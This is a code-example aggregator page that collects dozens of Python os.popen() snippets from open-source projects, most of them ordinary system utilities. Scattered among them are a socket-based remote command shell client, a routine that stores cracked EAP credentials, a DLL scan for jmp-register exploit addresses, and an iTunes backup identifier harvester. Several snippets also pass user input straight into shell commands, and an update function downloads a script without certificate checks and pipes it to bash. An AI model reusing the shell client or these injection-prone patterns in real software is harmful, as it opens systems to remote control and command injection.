Python os 模块,popen() 实例源码
我们从Python开源项目中,提取了以下48个代码示例,用于说明如何使用os.popen()。
def popen(cmd, mode="r", buffering=-1):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
if mode not in ("r", "w"):
raise ValueError("invalid mode %r" % mode)
if buffering == 0 or buffering is None:
raise ValueError("popen() does not support unbuffered streams")
import subprocess, io
if mode == "r":
proc = subprocess.Popen(cmd,
shell=True,
stdout=subprocess.PIPE,
bufsize=buffering)
return _wrap_close(io.TextIOWrapper(proc.stdout), proc)
else:
proc = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
bufsize=buffering)
return _wrap_close(io.TextIOWrapper(proc.stdin), proc)
# Helper for popen() -- a proxy for a file whose close waits for the process
def ssh_setup_agent(config, envkeys=None):
"""
Starts the ssh-agent
"""
envkeys = envkeys or ['SSH_PRIVATE_KEY']
output = os.popen('ssh-agent -s').readlines()
for line in output:
matches = re.search(r"(\S+)\=(\S+)\;", line)
if matches:
config.environ[matches.group(1)] = matches.group(2)
for envkey in envkeys:
key = os.environ.get(envkey)
if key:
ssh_add_key(config.environ, key)
else:
logging.warning('%s is missing', envkey)
def status(args):
with os.popen("docker inspect -f '{{json .State}}' " + args.container + " 2>&1") as pipe:
status = pipe.read().strip()
if "No such image or container" in status:
print "0"
else:
statusjs = json.loads(status)
if statusjs["Running"]:
print "1"
elif statusjs["ExitCode"] == 0:
print "2"
else:
print "3"
# get the uptime in seconds, if the container is running
def multi_stat_update(args, container_dir, filename):
dict = {}
try:
pipe = os.popen("docker exec " + args.container + " cat " + container_dir + "/" + filename + " 2>&1")
for line in pipe:
m = _STAT_RE.match(line)
if m:
dict[m.group(1)] = m.group(2)
pipe.close()
f = open(args.container + "/" + filename,"w")
for key in dict.keys():
f.write(key + " " + dict[key] + "\n")
f.close()
except Exception, e:
debug(args.container + ": could not update " + filename)
debug(str(sys.exc_info()))
return dict
def get_numa_spec():
maxnode=0
maxcpu=1
numasupport=False
try:
lines = [line.rstrip() for line in os.popen('numactl --show')]
if len(lines) > 0 : numasupport=True
for l in lines:
if l.startswith('nodebind'):
maxnode=int(l.split()[-1])
if l.startswith('physcpubind'):
maxcpu=int(l.split()[-1])
if "NO NUMA" in l.upper():
numasupport=False
except:
numasupport=False
return numasupport,maxnode,maxcpu
def open(self, url, new=0, autoraise=True):
if self._name == 'default':
script = 'open location "%s"' % url.replace('"', '%22') # opens in default browser
else:
script = '''
tell application "%s"
activate
open location "%s"
end
'''%(self._name, url.replace('"', '%22'))
osapipe = os.popen("osascript", "w")
if osapipe is None:
return False
osapipe.write(script)
rc = osapipe.close()
return not rc
# Don't clear _tryorder or _browsers since OS X can use above Unix support
# (but we prefer using the OS X specific stuff)
def _find_mac(command, args, hw_identifiers, get_index):
import os
for dir in ['', '/sbin/', '/usr/sbin']:
executable = os.path.join(dir, command)
if not os.path.exists(executable):
continue
try:
# LC_ALL to get English output, 2>/dev/null to
# prevent output on stderr
cmd = 'LC_ALL=C %s %s 2>/dev/null' % (executable, args)
with os.popen(cmd) as pipe:
for line in pipe:
words = line.lower().split()
for i in range(len(words)):
if words[i] in hw_identifiers:
return int(
words[get_index(i)].replace(':', ''), 16)
except IOError:
continue
return None
def _findLib_gcc(name):
expr = r'[^\(\)\s]*lib%s\.[^\(\)\s]*' % re.escape(name)
fdout, ccout = tempfile.mkstemp()
os.close(fdout)
cmd = 'if type gcc >/dev/null 2>&1; then CC=gcc; elif type cc >/dev/null 2>&1; then CC=cc;else exit 10; fi;' \
'$CC -Wl,-t -o ' + ccout + ' 2>&1 -l' + name
try:
f = os.popen(cmd)
try:
trace = f.read()
finally:
rv = f.close()
finally:
try:
os.unlink(ccout)
except OSError, e:
if e.errno != errno.ENOENT:
raise
if rv == 10:
raise OSError, 'gcc or cc command not found'
res = re.search(expr, trace)
if not res:
return None
return res.group(0)
def _get_soname(f):
# assuming GNU binutils / ELF
if not f:
return None
cmd = 'if ! type objdump >/dev/null 2>&1; then exit 10; fi;' \
"objdump -p -j .dynamic 2>/dev/null " + f
f = os.popen(cmd)
dump = f.read()
rv = f.close()
if rv == 10:
raise OSError, 'objdump command not found'
f = os.popen(cmd)
try:
data = f.read()
finally:
f.close()
res = re.search(r'\sSONAME\s+([^\s]+)', data)
if not res:
return None
return res.group(1)
def terminal_size():
"""
Return the number of terminal columns and rows, defaulting to
80x24 if the standard output is not a TTY.
NOTE THAT THIS ONLY WORKS ON UNIX.
"""
if sys.stdout.isatty():
# TODO: This only works on Unix.
rows, columns = [int(x) for x in
os.popen('stty size', 'r').read().split()]
else:
rows = 24
columns = 80
return rows, columns
def do_osx_install(srcdir, targetdir):
if os.path.exists(targetdir):
print 'Target dir %s already exists! Removing...'
shutil.rmtree(targetdir)
install_script = os.popen('find '+ srcdir +' -iname install.sh').read().strip()
print 'DBG install_script:', install_script
os.popen('chmod +x "%s"' % install_script)
cmd_install = '%s %s %s' % (pipes.quote(install_script), srcdir, targetdir)
print 'DBG cmd: "%s"' % cmd_install
cmd_chmod_chromium = 'find %s -name Chromium -exec chmod +x {} \;' % (targetdir)
cmd_chmod_chromium_helper = 'find %s -name Chromium\ Helper -exec chmod +x {} \;' % (targetdir)
for cmd in [cmd_install, cmd_chmod_chromium, cmd_chmod_chromium_helper]:
proc = subprocess.Popen(cmd, shell=True)
proc.wait()
if proc.returncode:
print "returncode " + str(proc.returncode)
def about(self, ctx):
'''About me'''
from clients import application_info
changes = os.popen(r'git show -s HEAD~3..HEAD --format="[`%h`](https://github.com/Harmon758/Harmonbot/commit/%H) %s (%cr)"').read().strip()
embed = discord.Embed(title = "About Me", color = clients.bot_color)
embed.description = "[Changelog (Harmonbot Server)]({})\n[Invite Link]({})".format(clients.changelog, discord.utils.oauth_url(application_info.id))
# avatar = ctx.message.author.avatar_url or ctx.message.author.default_avatar_url
# embed.set_author(name = ctx.message.author.display_name, icon_url = avatar)
avatar = self.bot.user.avatar_url or self.bot.user.default_avatar_url
# embed.set_thumbnail(url = avatar)
embed.set_author(name = "Harmonbot (Discord ID: {})".format(self.bot.user.id), icon_url = avatar)
if changes: embed.add_field(name = "Latest Changes:", value = changes, inline = False)
embed.add_field(name = "Created on:", value = "February 10th, 2016")
embed.add_field(name = "Version", value = clients.version)
embed.add_field(name = "Library", value = "[discord.py](https://github.com/Rapptz/discord.py) v{0}\n([Python](https://www.python.org/) v{1.major}.{1.minor}.{1.micro})".format(discord.__version__, sys.version_info))
me = discord.utils.get(self.bot.get_all_members(), id = clients.owner_id)
avatar = me.default_avatar_url if not me.avatar else me.avatar_url
embed.set_footer(text = "Developer/Owner: {0} (Discord ID: {0.id})".format(me), icon_url = avatar)
await self.bot.reply("", embed = embed)
await self.bot.say("Changelog (Harmonbot Server): {}".format(clients.changelog))
def __init__(self, prog, **kw):
try:
self.prog = prog
self.kw = kw
self.popen = None
if Popen.verbose:
sys.stdout.write("Popen created: %r, kw=%r..." % (prog, kw))
do_delegate = kw.get('stdout', None) == -1 and kw.get('stderr', None) == -1
if do_delegate:
if Popen.verbose:
print("Delegating to real Popen")
self.popen = self.real_Popen(prog, **kw)
else:
if Popen.verbose:
print("Emulating")
except Exception as e:
if Popen.verbose:
print("Exception: %s" % e)
raise
def __getattr__(self, name):
if Popen.verbose:
sys.stdout.write("Getattr: %s..." % name)
if name in Popen.__slots__:
if Popen.verbose:
print("In slots!")
return object.__getattr__(self, name)
else:
if self.popen is not None:
if Popen.verbose:
print("from Popen")
return getattr(self.popen, name)
else:
if name == "wait":
return self.emu_wait
else:
raise Exception("subprocess emulation: not implemented: %s" % name)
def __init__(self, prog, **kw):
try:
self.prog = prog
self.kw = kw
self.popen = None
if Popen.verbose:
sys.stdout.write("Popen created: %r, kw=%r..." % (prog, kw))
do_delegate = kw.get('stdout', None) == -1 and kw.get('stderr', None) == -1
if do_delegate:
if Popen.verbose:
print("Delegating to real Popen")
self.popen = self.real_Popen(prog, **kw)
else:
if Popen.verbose:
print("Emulating")
except Exception as e:
if Popen.verbose:
print("Exception: %s" % e)
raise
def __getattr__(self, name):
if Popen.verbose:
sys.stdout.write("Getattr: %s..." % name)
if name in Popen.__slots__:
if Popen.verbose:
print("In slots!")
return object.__getattr__(self, name)
else:
if self.popen is not None:
if Popen.verbose:
print("from Popen")
return getattr(self.popen, name)
else:
if name == "wait":
return self.emu_wait
else:
raise Exception("subprocess emulation: not implemented: %s" % name)
def __init__(self, prog, **kw):
try:
self.prog = prog
self.kw = kw
self.popen = None
if Popen.verbose:
sys.stdout.write("Popen created: %r, kw=%r..." % (prog, kw))
do_delegate = kw.get('stdout', None) == -1 and kw.get('stderr', None) == -1
if do_delegate:
if Popen.verbose:
print("Delegating to real Popen")
self.popen = self.real_Popen(prog, **kw)
else:
if Popen.verbose:
print("Emulating")
except Exception as e:
if Popen.verbose:
print("Exception: %s" % e)
raise
def post(self, *args, **kwargs):
try:
servidor = self.get_argument('grupo')
except:
servidor ="all"
item=""
corpo="{\"hosts\":["
import os
hosts=os.popen("ansible "+servidor+" --list-hosts").read()
item=hosts.replace("\n","\",")
item=item.replace(" "," \"")
#for options in hosts:
# item=item+" \""+options+"\","
item=item[1:-1]
corpo=corpo+item+"]}"
self.set_header("Content-Type", "application/json")
self.write(corpo);
def post(self, *args, **kwargs):
try:
servidor = self.get_argument('grupo')
except:
servidor ="all"
item=""
corpo="{\"hosts\":["
import os
hosts=os.popen("ansible "+servidor+" --list-hosts").read()
item=hosts.replace("\n","\",")
item=item.replace(" "," \"")
#for options in hosts:
# item=item+" \""+options+"\","
item=item[1:-1]
corpo=corpo+item+"]}"
self.set_header("Content-Type", "application/json")
self.write(corpo);
def step3():
key_vec = {}
maxx = 12505807
size = 10000
for i in range(size, maxx, size):
print(i, maxx)
res = os.popen("head -n {i} ./dataset/bind.txt | tail -n {size} | ./fasttext print-sentence-vectors ./models/model.bin".format(i=i, size=size)).read()
for line in res.split("\n"):
if line == "":
continue
vec = list(map(float, line.split()[-100:]))
txt = line.split()[:-100]
key = " ".join(txt)
if key_vec.get(key) is None:
key_vec[key] = vec
open("key_vec.pkl", "wb").write(pickle.dumps(key_vec))
def _step5(arr):
kmeans = pickle.loads(open("kmeans.model", "rb").read())
key, lines, tipe = arr
print(key)
open("./tmp/tmp.{tipe}.{key}.txt".format(tipe=tipe,key=key), "w").write("\n".join(lines))
res = os.popen("./fasttext print-sentence-vectors ./models/model.bin < tmp/tmp.{tipe}.{key}.txt".format(tipe=tipe, key=key)).read()
w = open("tmp/tmp.{tipe}.{key}.json".format(tipe=tipe,key=key), "w")
for line in res.split("\n"):
try:
vec = list(map(float, line.split()[-100:]))
except:
print(line)
print(res)
continue
x = np.array(vec)
if np.isnan(x).any():
continue
cluster = kmeans.predict([vec])
txt = line.split()[:-100]
obj = {"txt": txt, "cluster": cluster.tolist()}
data = json.dumps(obj, ensure_ascii=False)
w.write( data + "\n" )
def main():
file_name = "dnsbee.txt"
dot = "."
if (os.path.exists(file_name)):
file = open(file_name,"a")
else:
file = open(file_name,"w")
host = sys.argv[1]
nameserver = sys.argv[2]
print "Trying to query",
for i in range(0,len(records)):
string = "dig " + records[i] + " " + host + " @" + nameserver
command = os.popen(string,"r")
while(1):
line = command.readline()
#line = line.strip()
if line:
print ".",
file.write("Query> " + string + ":\n")
file.write(line)
else:
break
def find_jmpreg(self,dir="c:\windows\system32"):
k = os.listdir("c:\windows\system32")
for z in k:
if z.endswith(".dll"):
data = []
cmd = "%s -D C:\windows\system32\%s" % (self.objdump,z)
fh = os.popen(cmd,"r")
data = fh.read(100000).split("\n")
fh.close()
for r in data:
y = "eb\x20%s" % self.reg
if r.find("jmp") != -1 and r.find(y) != -1:
(addy,null) = r.split(":")
temp = "0x%s" % addy
print temp
self.addrs[z] = int(temp,0)
self.found = 1
if self.found != 1:
print "found no jmp [reg]!"
return 0
return 1
# pre defined database of jmp's
def gpu_status(self,av_type_list):
for t in av_type_list:
cmd='nvidia-smi -q --display='+t
#print('\nCMD:',cmd,'\n')
r=os.popen(cmd)
info=r.readlines()
r.close()
content = " ".join(info)
#print('\ncontent:',content,'\n')
index=content.find('Attached GPUs')
s=content[index:].replace(' ','').rstrip('\n')
self.t_send(s)
time.sleep(.5)
#th.exit()
#==============================================================================
#
#==============================================================================
def WriteResult(s_file, s_string):
LOCK.acquire()
try:
found = False
datafile = file(s_file)
for dataline in datafile:
if s_string in dataline:
found = True
break
if found == False:
f = open(s_file, 'a')
f.write(str(s_string) + "\n")
f.close()
s = str("pkill -SIGHUP hostapd")
p = os.popen(s, "r")
while 1:
line = p.readline()
if not line:
break
except:
PrintResult(1, "Error writing cracked user credentials to EAP users file. :( Sorz")
LOCK.release()
# This is the worker thread section.
def _syscmd_uname(option,default=''):
""" Interface to the system's uname command.
"""
if sys.platform in ('dos','win32','win16','os2'):
# XXX Others too ?
return default
try:
f = os.popen('uname %s 2> %s' % (option, DEV_NULL))
except (AttributeError,os.error):
return default
output = string.strip(f.read())
rc = f.close()
if not output or rc:
return default
else:
return output
def _popen(command, args):
import os
path = os.environ.get("PATH", os.defpath).split(os.pathsep)
path.extend(('/sbin', '/usr/sbin'))
for dir in path:
executable = os.path.join(dir, command)
if (os.path.exists(executable) and
os.access(executable, os.F_OK | os.X_OK) and
not os.path.isdir(executable)):
break
else:
return None
# LC_ALL to ensure English output, 2>/dev/null to prevent output on
# stderr (Note: we don't have an example where the words we search for
# are actually localized, but in theory some system could do so.)
cmd = 'LC_ALL=C %s %s 2>/dev/null' % (executable, args)
return os.popen(cmd)
def _ipconfig_getnode():
"""Get the hardware address on Windows by running ipconfig.exe."""
import os, re
dirs = ['', r'c:\windows\system32', r'c:\winnt\system32']
try:
import ctypes
buffer = ctypes.create_string_buffer(300)
ctypes.windll.kernel32.GetSystemDirectoryA(buffer, 300)
dirs.insert(0, buffer.value.decode('mbcs'))
except:
pass
for dir in dirs:
try:
pipe = os.popen(os.path.join(dir, 'ipconfig') + ' /all')
except IOError:
continue
with pipe:
for line in pipe:
value = line.split(':')[-1].strip().lower()
if re.match('([0-9a-f][0-9a-f]-){5}[0-9a-f][0-9a-f]', value):
return int(value.replace('-', ''), 16)
def _read_output(commandstring):
"""Output from successful command execution or None"""
# Similar to os.popen(commandstring, "r").read(),
# but without actually using os.popen because that
# function is not usable during python bootstrap.
# tempfile is also not available then.
import contextlib
try:
import tempfile
fp = tempfile.NamedTemporaryFile()
except ImportError:
fp = open("/tmp/_osx_support.%s"%(
os.getpid(),), "w+b")
with contextlib.closing(fp) as fp:
cmd = "%s 2>/dev/null >'%s'" % (commandstring, fp.name)
return fp.read().strip() if not os.system(cmd) else None
def _findLib_gcc(name):
expr = r'[^\(\)\s]*lib%s\.[^\(\)\s]*' % re.escape(name)
fdout, ccout = tempfile.mkstemp()
os.close(fdout)
cmd = 'if type gcc >/dev/null 2>&1; then CC=gcc; elif type cc >/dev/null 2>&1; then CC=cc;else exit 10; fi;' \
'LANG=C LC_ALL=C $CC -Wl,-t -o ' + ccout + ' 2>&1 -l' + name
try:
f = os.popen(cmd)
try:
trace = f.read()
finally:
rv = f.close()
finally:
try:
os.unlink(ccout)
except OSError, e:
if e.errno != errno.ENOENT:
raise
if rv == 10:
raise OSError, 'gcc or cc command not found'
res = re.search(expr, trace)
if not res:
return None
return res.group(0)
def _get_soname(f):
# assuming GNU binutils / ELF
if not f:
return None
cmd = 'if ! type objdump >/dev/null 2>&1; then exit 10; fi;' \
"objdump -p -j .dynamic 2>/dev/null " + f
f = os.popen(cmd)
dump = f.read()
rv = f.close()
if rv == 10:
raise OSError, 'objdump command not found'
f = os.popen(cmd)
try:
data = f.read()
finally:
f.close()
res = re.search(r'\sSONAME\s+([^\s]+)', data)
if not res:
return None
return res.group(1)
def _findLib_crle(name, is64):
if not os.path.exists('/usr/bin/crle'):
return None
if is64:
cmd = 'env LC_ALL=C /usr/bin/crle -64 2>/dev/null'
else:
cmd = 'env LC_ALL=C /usr/bin/crle 2>/dev/null'
for line in os.popen(cmd).readlines():
line = line.strip()
if line.startswith('Default Library Path (ELF):'):
paths = line.split()[4]
if not paths:
return None
for dir in paths.split(":"):
libfile = os.path.join(dir, "lib%s.so" % name)
if os.path.exists(libfile):
return libfile
return None
def iTunes_backup_looker():
backupPath = globber("/Users/*/Library/Application Support/MobileSync/Backup/*/Info.plist")
if len(backupPath) > 0:
backups = True
returnable = "%sLooking for backups! %s\n" % (blue_star, blue_star)
for z, y in enumerate(backupPath):
returnable += "\n----- Device " + str(z + 1) + " -----\n\n"
returnable += "Product Name: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Product Name\"' '%s'" % y).read().replace("\n", "")
returnable += "Product Version: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Product Version\"' '%s'" % y).read().replace("\n", "")
returnable += "Last Backup Date: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Last Backup Date\"' '%s'" % y).read().replace("\n", "")
returnable += "Device Name: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Device Name\"' '%s'" % y).read().replace("\n", "")
returnable += "Phone Number: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Phone Number\"' '%s'" % y).read().replace("\n", "")
returnable += "Serial Number: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Serial Number\"' '%s'" % y).read().replace("\n", "")
returnable += "IMEI/MEID: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"IMEI\"' '%s'" % y).read().replace("\n", "")
returnable += "UDID: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Target Identifier\"' '%s'" % y).read().replace("\n", "")
returnable += "iTunes Version: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"iTunes Version\"' '%s'" % y).read().replace("\n", "")
#iTunesBackupString += "Installed Apps: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Installed Applications\"' '%s'" % y).read().replace("\n", "")
else:
backups = False
returnable = "%sNo local backups found %s\n" % (blue_star, blue_star)
return (returnable, backups, len(backupPath))
def __print_log_event(self, event):
time_string = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(event['timestamp']/1000))
rows, columns = os.popen('stty size', 'r').read().split()
line_wrap = int(columns) - 22
message_lines = str(event['message']).splitlines()
formatted_lines = []
for line in message_lines:
line = line.replace('\t',' ')
formatted_lines.append('\n'.join(line[i:i+line_wrap] for i in range(0, len(line), line_wrap)))
message_string = '\n'.join(formatted_lines)
message_string = message_string.replace('\n','\n ')
print(time_string + " - " + message_string)
def __init__(self):
self.client = socket(AF_INET, SOCK_STREAM)
self.client.connect(self.ADDR)
while True:
data = self.client.recv(BUFSIZ)
if data:
try:
if data == "exit":
self.client.close()
break
ME = os.popen(data.decode('utf8'))
os_result = ME.read()
#print(os_result)
self.client.sendall(os_result)
except:
self.client.close()
def test_no_memory_leak():
import gc
import os
def rss():
gc.collect()
out = os.popen("ps -o rss= -p %d" % os.getpid()).read()
return int(out.strip())
before = rss()
for _ in range(100000):
n = Name.parse("Reallyverylongfirstname Reallyverylonglastname")
n.given_name
n.surname
after = rss()
assert after < 1.25 * before
def Update():
# Check for ROOT
# If "uls --update" is not run as ROOT, notify user & exit.
print('Checking for ROOT...')
if os.geteuid() != 0:
print("ERR_1005: 'uls --update' must be run as ROOT. Use 'sudo uls --update' instead.")
exit(1005)
# Check for Internet connection before update
print('Checking for Internet connection...')
rPing = os.popen("ping -c 3 raw.githubusercontent.com | grep '0 received' | wc -l")
strPing = rPing.read().strip('\n')
rPing.close()
# If Internet is unavailable, exit.
if strPing == '1':
print('ERR_1003: Internet is unavailable. Check your connection before running update.')
exit(1003)
# Now, do the update
os.system("wget --no-check-certificate -O /usr/share/uls/uls_update.sh https://raw.githubusercontent.com/CYRO4S/Universal-Linux-Script/master/uls_update.sh && bash /usr/share/uls/uls_update.sh")
exit(0)
# Echo
def test_no_unknown_exported_symbols():
if not hasattr(_cffi_backend, '__file__'):
py.test.skip("_cffi_backend module is built-in")
if not sys.platform.startswith('linux'):
py.test.skip("linux-only")
g = os.popen("objdump -T '%s'" % _cffi_backend.__file__, 'r')
for line in g:
if not line.startswith('0'):
continue
if '*UND*' in line:
continue
name = line.split()[-1]
if name.startswith('_') or name.startswith('.'):
continue
if name not in ('init_cffi_backend', 'PyInit__cffi_backend'):
raise Exception("Unexpected exported name %r" % (name,))
g.close()
def parse_batch(self, sentenceDumpedFileName, parsingDumpedFileName):
if os.path.exists('../stanford-parser-2012-03-09') == False:
print >> sys.stderr, 'can not find Stanford parser directory'
sys.exit(1)
# tokenized
cmd = r'java -server -mx4096m -cp "../stanford-parser-2012-03-09/*:" edu.stanford.nlp.parser.lexparser.LexicalizedParser -retainTMPSubcategories -sentences newline -tokenized -escaper edu.stanford.nlp.process.PTBEscapingProcessor -outputFormat "wordsAndTags, penn, typedDependencies" -outputFormatOptions "basicDependencies" edu/stanford/nlp/models/lexparser/englishPCFG.ser.gz ' + sentenceDumpedFileName
r = os.popen(cmd).read().strip().decode('utf-8')
f = open(parsingDumpedFileName, 'w')
f.write(r.encode('utf-8'))
f.close()
rlist = r.replace('\n\n\n', '\n\n\n\n').split('\n\n')
return rlist
def parse_batch(self, sentenceDumpedFileName, parsingDumpedFileName):
if os.path.exists('../stanford-parser-2012-03-09') == False:
print >> sys.stderr, 'can not find Stanford parser directory'
sys.exit(1)
# tokenized
cmd = r'java -server -mx4096m -cp "../stanford-parser-2012-03-09/*:" edu.stanford.nlp.parser.lexparser.LexicalizedParser -retainTMPSubcategories -sentences newline -tokenized -escaper edu.stanford.nlp.process.PTBEscapingProcessor -outputFormat "wordsAndTags, penn, typedDependencies" -outputFormatOptions "basicDependencies" edu/stanford/nlp/models/lexparser/englishPCFG.ser.gz ' + sentenceDumpedFileName
r = os.popen(cmd).read().strip().decode('utf-8')
f = open(parsingDumpedFileName, 'w')
f.write(r.encode('utf-8'))
f.close()
rlist = r.replace('\n\n\n', '\n\n\n\n').split('\n\n')
return rlist
def monkey_func(self, url, new=0, autoraise=True):
if self._name == 'default':
script = 'do shell script "open %s"' % url.replace('"', '%22') # opens in default browser
else:
script = '''
tell application "%s"
activate
open location "%s"
end
''' % (self._name, url.replace('"', '%22'))
osapipe = os.popen("osascript", "w")
if osapipe is None:
return False
osapipe.write(script)
rc = osapipe.close()
return not rc
def console_setup():
global COLOR_WINDOW_TX
global COLOR_WINDOW_BG
global WINDOW_ROWS
global WINDOW_COLS
global WINDOW_HANDLE
OUTPUT_ROW_BUFFER=WINDOW_ROWS
os.system("@title FileBot v"+__version__)
os.system("color "+str(hex(COLOR_WINDOW_TX+COLOR_WINDOW_BG*16))[2:])
os.popen("mode con: lines="+str(WINDOW_ROWS)+" cols="+str(WINDOW_COLS))
WINDOW_HANDLE=ctypes.windll.kernel32.GetStdHandle(-12)
ctypes.windll.kernel32.SetConsoleScreenBufferSize(WINDOW_HANDLE,OUTPUT_ROW_BUFFER*(2**16)+WINDOW_COLS)
cursor_visibility(False)
return
def translate(word):
if not word:
return
if re.match(u'.*[\u4e00-\u9fa5].*', word) or ' ' in word:
p = {'wd': word}
return "http://dict.baidu.com/s?" + urllib.parse.urlencode(p)
reses = os.popen('sdcv -n ' + word).readlines()
if not re.match(u'^Found 1 items.*', reses[0]):
p = {'wd': word}
return "http://dict.baidu.com/s?" + urllib.parse.urlencode(p)
res = ''
for i in range(4, len(reses)):
res += reses[i]
res = re.sub(u'\[.+\]', '', res)
res = res.replace('\n', '')
res = res.replace('//', '\r')
return res
def getXmlInfo(self):
xml_cmd = ''
self.lastError = ''
if 'Windows' in platform.system():
xml_cmd = "%s d xmltree \"%s\" AndroidManifest.xml " % (self.aapt_path, self.apk_path)
# xml_cmd = "%s%saapt.exe d xmltree \"%s\" AndroidManifest.xml "%(self.aapt_path,os.sep, self.apk_path)
if 'Linux' in platform.system():
xml_cmd = "%s%saapt d xmltree %s AndroidManifest.xml " % (self.aapt_path, os.sep, self.apk_path)
try:
strxml = os.popen(xml_cmd)
self.xmltree = strxml.read()
except Exception as e:
# print "aapt Mainfestxml error"
self.lastError = 'aapt get AndroidManifest.xml error'
return False
return True
# ?xml???????
def _popen(command, args):
import os
path = os.environ.get("PATH", os.defpath).split(os.pathsep)
path.extend(('/sbin', '/usr/sbin'))
for dir in path:
executable = os.path.join(dir, command)
if (os.path.exists(executable) and
os.access(executable, os.F_OK | os.X_OK) and
not os.path.isdir(executable)):
break
else:
return None
# LC_ALL to ensure English output, 2>/dev/null to prevent output on
# stderr (Note: we don't have an example where the words we search for
# are actually localized, but in theory some system could do so.)
cmd = 'LC_ALL=C %s %s 2>/dev/null' % (executable, args)
return os.popen(cmd)
def _ipconfig_getnode():
"""Get the hardware address on Windows by running ipconfig.exe."""
import os, re
dirs = ['', r'c:\windows\system32', r'c:\winnt\system32']
try:
import ctypes
buffer = ctypes.create_string_buffer(300)
ctypes.windll.kernel32.GetSystemDirectoryA(buffer, 300)
dirs.insert(0, buffer.value.decode('mbcs'))
except:
pass
for dir in dirs:
try:
pipe = os.popen(os.path.join(dir, 'ipconfig') + ' /all')
except IOError:
continue
with pipe:
for line in pipe:
value = line.split(':')[-1].strip().lower()
if re.match('([0-9a-f][0-9a-f]-){5}[0-9a-f][0-9a-f]', value):
return int(value.replace('-', ''), 16)
def _popen(command, args):
import os
path = os.environ.get("PATH", os.defpath).split(os.pathsep)
path.extend(('/sbin', '/usr/sbin'))
for dir in path:
executable = os.path.join(dir, command)
if (os.path.exists(executable) and
os.access(executable, os.F_OK | os.X_OK) and
not os.path.isdir(executable)):
break
else:
return None
# LC_ALL to ensure English output, 2>/dev/null to prevent output on
# stderr (Note: we don't have an example where the words we search for
# are actually localized, but in theory some system could do so.)
cmd = 'LC_ALL=C %s %s 2>/dev/null' % (executable, args)
return os.popen(cmd)
def parse_icon(self, icon_path=None):
"""
parse icon.
:param icon_path: icon storage path
"""
if not icon_path:
icon_path = os.path.dirname(os.path.abspath(__file__))
pkg_name_path = os.path.join(icon_path, self.package)
if not os.path.exists(pkg_name_path):
os.mkdir(pkg_name_path)
aapt_line = "aapt dump badging %s | grep 'application-icon' | awk -F ':' '{print $2}'" % self.get_filename()
parse_icon_rt = os.popen(aapt_line).read()
icon_paths = [icon.replace("'", '') for icon in parse_icon_rt.split('\n') if icon]
zfile = zipfile.ZipFile(StringIO.StringIO(self.__raw), mode='r')
for icon in icon_paths:
icon_name = icon.replace('/', '_')
data = zfile.read(icon)
with open(os.path.join(pkg_name_path, icon_name), 'w+b') as icon_file:
icon_file.write(data)
print "APK ICON in: %s" % pkg_name_path